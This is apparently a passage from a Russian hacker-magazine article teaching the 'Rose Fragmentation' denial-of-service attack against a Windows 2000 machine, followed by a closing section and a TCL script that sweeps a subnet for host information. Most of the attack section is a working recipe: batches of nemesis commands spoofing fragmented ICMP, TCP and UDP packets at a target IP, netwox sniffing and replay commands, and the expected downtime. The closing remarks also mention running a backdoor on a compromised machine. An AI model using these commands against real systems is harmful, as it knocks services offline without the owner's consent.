/* Rose Fragmentation Attack */

Последний пример я объясню на основе способа осуществления атаки Rose Fragmentation, метод и технологию которой подробно осветил хакер под ником Gendalf. Так как мое место в журнале ограниченно, подробно почитать об этом стоит здесь: http://digital.net/~gandalf/Rose_Frag_Attack_Explained.txt. В дополнение к netwox, нам понадобится не менее полезная утилита nemesis (http://www.packetfactory.net/projects/nemesis/). Поставь его для определенности, в корень диска C:\. Условимся в следующем: Пусть A – компьютер атакующего, B – атакуемый компьютер под управлением Windwos 2000 со всеми сервис-паками, его IP-адрес, например, будет 10.32.3.15, С – некий сторонний компьютер. Далее сохраним файлы Picmpdata.txt Ptcpdata.txt и Pudpdata.txt, которые Gendalf специально скорректировал для создания подходящих фрагментированных пакетов. Найти эти файлы для всех протоколов можно по адресам http://digital.net/~gandalf/Ptcpdata.txt
http://digital.net/~gandalf/Pudpdata.txt
http://digital.net/~gandalf/Picmpdata.txt. Также нам понадобится файл nemITUrnd.xls (http://digital.net/~gandalf/nemITUrnd.xls).
Его следует отредктировать - выделяй в нем строки и опускайся до тех пор, пока не получим 700 строк, далее сохраняем под именем temp.csv - MS-DOS Comma Separated Text. Затем переименуем его в temp.txt и откроем. В нем ты увидишь следующие строки:

nemesis icmp -S 10.,3,.,64,.,121, -D 10.32.3.15 -d1 -i 8 -I ,7242, -P Picmpdata.txt -FM0,~,nemesis ip -S 10.,3,.,64,.,121, -D 10.32.3.15 -d1 -I ,7242, -p 1 -P Picmpdata.txt -F8100,~,nemesis tcp -S 10.,196,.,212,.,207, -D 10.32.3.15 -d1 -I ,2153, -s ,2494456820, -x ,36961, -y ,63398, -P Ptcpdata.txt -FM0,~,nemesis ip -S 10.,196,.,212,.,207, -D 10.32.3.15 -d1 -I ,2153, -p 6 -P Ptcpdata.txt -F8100,~,nemesis udp -S 10.,195,.,74,.,172, -D 10.32.3.15 -d1 -I ,6316, -x ,13253, -y ,20460, -P Pudpdata.txt -FM0,~,nemesis ip -S 10.,195,.,74,.,172, -D 10.32.3.15 -d1 -I ,6316, -p 17 -P Pudpdata.txt -F8100

Тебе следует заменить символ тильды “~” везде на знак новой строки, затем сохранить полученное и заменить “,” на пробелы, сохранить и выйти. Полученный файл переименовываем в temp.bat и помещаем в папку с Nemesis. Затем воспользуемся сниффером, входящим в состав netwox под счастливым номером 7 для сбора случайных пакетов, которые нам понадобятся для отправки Nemesis’ом:

netwox 7 --outfile "nemesispingbig.txt" --recordencode "hexa" --filter "host 10.32.3.15"

В данном случае все собранные пакеты, уходящие на IP-адрес 10.32.3.15 будут записаны в шеснадцатиричном виде в файл nemesispingbig.txt. Далее откроем командную строку и наберем: C:\nemesis>temp.bat Оставив nemesis работающим в течение нескольких часов, мы получим около 35000 пакетов. Если скорость канала компьютера A достаточно велика, фрагментированные ICMP-запросы с компьютера С покажут, что компьютер не отвечает (ping Request Time Out). По окончанию работы nemesis, компьютер B снова подаст признаки жизни. Теперь попробуем устроить DoS другим методом – отправим все эти пакеты разом с помощью утилиты netwox 14 - Spoof a record: netwox 14 -s –file nemesispingbig.txt. Что же мы получим теперь, выполнив ping -t -l 1600 10.32.3.15? Атакуемый компьютер будет находиться в дауне на протяжении не менее 2-3 минут.

/* Вместо заключения */

Так что же мы имеем? Не стоит опошлять смысл слова, ведь в действительности данная программа в руках деструктора может превратиться в страшное оружие, хотя и была изначально создана как утилита для администраторов и их потребностей в тестировании маршрутизаторов, сететей и т.п, а не как набор хакерских утилит. Пользуйся netwox с умом и не применяй его в злых целях – больше позитива, Друг Мой. И напоследок хочу заметить, что в своей статье по большей части я использовал только утилиты netwox из класса спуферов и конструкторов пакетов, но это лишь малая часть из всего их многообразия, ведь с помощью netwox можно даже запустить бэкдор на порутанной тачке, стоит лишь найти утилиту TCP-сервер или даже HTTP сервер удаленного администрирования, а может поднять временный FTP или SMTP сервер. Однако по сложившейся традиции, оставлю их изучение тебе: в них нет ничего сложного. Ах, да! Помнится, обещал рассказать тебе, как с помощью netwox сварить кофе. Думаешь невозможно и это очередная шутка? Ан нет! Laurent Constantin, создатель программы, решил что и эту возможность стоит добавить – запускай netwox 190 и через несколько секунд твой кофе будет готов. Вот это позитив!

P.S: Автоматизация процесса
Естественно, иногда приходится автоматизировать процесс работы с некоторыми программами. Если ты пользуешься *nix-like системой – с тобой все понятно: perl или bash-скрипты спасут мир. А что же делать пользователям Windows? Можно, безусловно, писать пакетные bat-файлы, но это решение не есть хорошо =) Ты ведь поставил TCL для front-end оболочки netwag? – вот и используй все его возможности на всю катушку и по назначению. Пусть нам требуется узнать информацию (Ethernet-адрес и имена) о каждом хосте из подсети 192.168.0.* - пишем простенький TCL-скрипт:

#!/usr/bin/wish
for {set i 0} {$i < 255} {incr i} {
puts "\nTesting $i"
set ipad "192.168.0.$i"
if [catch {exec netwox 3 $ipad} data] {
puts "Error during exec : $data"
} else {
puts $data
}
}
exit

И не надо нам никаких извращений.

Автор: ShadOS

Email: ShadOS [at] real [d0t] xakep [d0t] ru
http://hellknights.void.ru/

-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-
(c) Hell Knights Crew //ShadOS

__________________

..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....